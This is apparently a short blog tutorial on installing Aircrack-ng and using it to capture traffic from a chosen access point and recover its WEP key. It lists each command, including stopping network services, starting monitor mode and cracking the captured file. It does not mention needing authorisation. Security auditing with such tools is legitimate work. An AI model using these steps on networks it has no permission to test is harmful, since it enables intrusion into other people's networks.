Installing and configuring Aircrack-ng

Aircrack-ng is a set of programs designed to detect wireless networks, intercept traffic transmitted over wireless networks, audit WEP and WPA/WPA2-PSK encryption keys (strength test).
Official site: www.aircrack-ng.org

Installs in Ubuntu like this:

sudo apt-get install aircrack-ng

We look at the name of the wireless network interface (it is usually called wlan0):

sudo iwconfig

We scan existing Wi-Fi networks and look at their encryption type, channel, etc.

sudo iwlist scanning

We look at the running network services:

sudo airmon-ng check

Stop interfering:

sudo stop network-manager
sudo stop avahi-daemon
sudo killall wpa_supplicant

Launch a monitor named mon0:

sudo airmon-ng start wlan0

For convenience, we open a new terminal (so that we can return to the previous one with the list of networks at any time) and intercept all packets into a file (by default it is created in the user’s directory):

sudo airodump-ng --channel N -w wep -i --bssid MAC mon0

Where N is the number of the wifi channel, MAC is the MAC address of the access point.

We select the key from the file:

sudo aircrack-ng -a 1 -0 wep-01.ivs

We start the network-manager network service back so that we can connect to the wireless network:

sudo start network-manager

We connect to the wireless point and enter the security key already known to us.

Leave a comment

Leave a Reply